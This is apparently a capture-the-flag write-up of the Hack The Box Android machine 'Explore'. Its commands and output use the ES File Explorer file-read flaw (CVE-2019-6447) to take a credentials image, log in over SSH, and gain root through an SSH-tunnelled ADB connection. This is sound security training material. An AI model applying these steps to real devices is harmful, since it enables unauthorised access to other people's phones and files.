Previous Page

nihilist - 20 / 11 / 2022

Explore Writeup

Introduction :



Explore is an easy Android box released back in June 2021

Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ nmap -sCV -p- explore.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-20 12:49 UTC
Nmap scan report for explore.htb (10.129.17.72)
Host is up (0.71s latency).

PORT      STATE  SERVICE VERSION
2222/tcp  open   ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
42135/tcp open   http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: ES Name Response Server
45141/tcp closed unknown
59777/tcp open   http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.92%I=7%D=11/20%Time=637A2270%P=x86_64-pc-linux-gnu%r(N
SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
Service Info: Device: phone

Part 2 : Getting User Access



Our nmap scan picked up a http service on port 59777 so let's investigate it using gobuster:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ gobuster dir -u http://explore.htb:59777 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://explore.htb:59777
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/20 12:42:26 Starting gobuster in directory enumeration mode
===============================================================
/product              (Status: 301) [Size: 71] [--> /product/]
/data                 (Status: 301) [Size: 65] [--> /data/]
/d                    (Status: 301) [Size: 59] [--> /d/]
/bin                  (Status: 301) [Size: 63] [--> /bin/]
/storage              (Status: 301) [Size: 71] [--> /storage/]
/system               (Status: 301) [Size: 69] [--> /system/]
/lib                  (Status: 301) [Size: 63] [--> /lib/]
/dev                  (Status: 301) [Size: 63] [--> /dev/]
/cache                (Status: 301) [Size: 67] [--> /cache/]
/etc                  (Status: 301) [Size: 63] [--> /etc/]
/vendor               (Status: 301) [Size: 69] [--> /vendor/]
/config               (Status: 301) [Size: 69] [--> /config/]
/oem                  (Status: 301) [Size: 63] [--> /oem/]
/%20                  (Status: 403) [Size: 32]
/sys                  (Status: 301) [Size: 63] [--> /sys/]
/init                 (Status: 403) [Size: 31]

Trying to browse to it doesnt show much either:

However when we look back at our nmap scan, it also picked up port 42135 "ES File Explorer", so we look at the available exploits for it:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ findsploit  es file explorer
   ___ _           _           _       _ _
  / __(_)_ __   __| |___ _ __ | | ___ (_) |_
 / _\ | | '_ \ / _` / __| '_ \| |/ _ \| | __|
/ /   | | | | | (_| \__ \ |_) | | (_) | | |_
\/    |_|_| |_|\__,_|___/ .__/|_|\___/|_|\__|
                        |_|

 + -- --=[ findsploit v2.0 by @xer0dayz
 + -- --=[ https://sn1persecurity.com

 + -- --=[ SEARCHING:  es file explorer

 + -- --=[ NMAP SCRIPTS

egrep: warning: egrep is obsolescent; using grep -E
egrep: warning: egrep is obsolescent; using grep -E
egrep: warning: egrep is obsolescent; using grep -E

 + -- --=[ METASPLOIT EXPLOIT S

egrep: warning: egrep is obsolescent; using grep -E
egrep: warning: egrep is obsolescent; using grep -E
egrep: warning: egrep is obsolescent; using grep -E
   378   gather/ie_sandbox_findfiles                                    2016-08-09       normal  No     Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability
   550   scanner/http/es_file_explorer_open_port                        2019-01-16       normal  No     ES File Explorer Open Port

 + -- --=[ EXPLOITDB EXPLOITS

------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
ES File Explorer 4.1.9.7.4 - Arbitrary File Read                                           | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal                                               | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure                                  | windows/remote/20488.txt
Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)    | windows/remote/3808.html
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)        | windows/remote/24495.rb
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)        | windows/remote/24538.rb
Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)              | windows/remote/25999.rb
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)                               | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File  | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame A | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptl | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass                            | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution                             | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access                                          | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)                          | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities                                  | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection                                        | php/webapps/35851.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

https://www.exploit-db.com/search?q=es+file+explorer
https://www.google.ca/search?q=es%20file%20explorer+exploit
https://www.google.ca/search?q=es%20file%20explorer+exploit+site:www.securityfocus.com
https://www.google.ca/search?q=es%20file%20explorer+site:0day.today
https://www.google.ca/search?q=es%20file%20explorer+site:www.security-database.com
https://www.google.ca/search?q=es%20file%20explorer+site:packetstormsecurity.com
https://exploits.shodan.io/?q=es+file+explorer
https://vulners.com/search?query=es+file+explorer

 + -- --=[ Press any key to search online or Ctrl+C to exit...


In here we find a CVE to read arbitrary files on ES File Explorer, so let's try it out:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ cp $(locate 50070.py) .

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ vim 50070.py

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ python 50070.py help explore.htb
[-] WRONG COMMAND!
Available commands :
  listFiles         : List all Files.
  listPics          : List all Pictures.
  listVideos        : List all videos.
  listAudios        : List all audios.
  listApps          : List Applications installed.
  listAppsSystem    : List System apps.
  listAppsPhone     : List Communication related apps.
  listAppsSdcard    : List apps on the SDCard.
  listAppsAll       : List all Application.
  getFile           : Download a file.
  getDeviceInfo     : Get device info.

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ python 50070.py listPics explore.htb

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

Here the creds.jpg file looks interesting so let's download it:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ wget http://explore.htb:59777/storage/emulated/0/DCIM/creds.jpg

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ file creds.jpg
creds.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [\012- TIFF image data, big-endian, direntries=12, manufacturer=Apple, model=iPhone XR, orientation=upper-right, xresolution=174, yresolution=182, resolutionunit=2, software=14.4, datetime=2021:03:06 02:13:37, hostcomputer=iPhone XR, GPS-Data], comment: "Optimized by JPEGmini 3.18.2.210033067-TBTBLN 0x905c306b", baseline, precision 8, 4032x3024, components 3

On it we find credentials:

So from here we can login as the kristi user with her password "Kr1sT!5h@Rp3xPl0r3!":


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@explore.htb
Unable to negotiate with 10.129.17.72 port 2222: no matching host key type found. Their offer: ssh-rsa

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ vim ~/.ssh/config

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ cat ~/.ssh/config| head -n6
Host explore
    HostName explore.htb
    User kristi
    PubkeyAcceptedAlgorithms +ssh-rsa
        HostkeyAlgorithms +ssh-rsa
        Port 2222

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ sshpub explore
The authenticity of host '[explore.htb]:2222 ([10.129.17.72]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[explore.htb]:2222' (RSA) to the list of known hosts.
Password authentication
(kristi@explore.htb) Password:
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768

Once logged in, we find the user flag in the /sdcard directory:


:/ $ ls
acct                   init.superuser.rc       sbin
bin                    init.usb.configfs.rc    sdcard
bugreports             init.usb.rc             sepolicy
cache                  init.zygote32.rc        storage
charger                init.zygote64_32.rc     sys
config                 lib                     system
d                      mnt                     ueventd.android_x86_64.rc
data                   odm                     ueventd.rc
default.prop           oem                     vendor
dev                    plat_file_contexts      vendor_file_contexts
etc                    plat_hwservice_contexts vendor_hwservice_contexts
fstab.android_x86_64   plat_property_contexts  vendor_property_contexts
init                   plat_seapp_contexts     vendor_seapp_contexts
init.android_x86_64.rc plat_service_contexts   vendor_service_contexts
init.environ.rc        proc                    vndservice_contexts
init.rc                product
:/ $ cd sdcard/
:/sdcard $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt
Android Download Music  Pictures      Ringtones dianxinos
:/sdcard $ cat user.txt
f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And we got the user flag!

Part 3 : Getting Root Access



Now in order to privesc we look back at our nmap scan which picked up port 5555, and usually this port is used for the Android Debug Bridge, so let's try to connect to it:


[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ adb connect explore.htb:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
^C

Doesnt work, because usually adb is used when you want to debug an android phone locally, so let's port forward port 5555:


[term1]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ sshpub -p 2222 -L 5555:localhost:5555 explore
Password authentication
(kristi@explore.htb) Password:
:/ $

[term2]
[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ adb connect 127.0.0.1:5555
connected to 127.0.0.1:5555

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ adb root
restarting adbd as root

[ 10.10.16.14/23 ] [ nowhere ] [~/HTB/Explore]
→ adb shell
x86_64:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:su:s0
x86_64:/ # cat /data/root.txt
f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We managed to get the root flag.

Conclusion



Here we can see the progress graph :